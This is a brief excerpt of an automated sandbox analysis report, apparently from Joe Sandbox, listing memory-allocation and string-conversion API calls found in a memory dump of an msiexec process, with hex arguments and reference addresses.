• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@

APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
• malloc.MSVCRT ref: 00417407
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
• free.MSVCRT ref: 00417425
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWide$freemalloc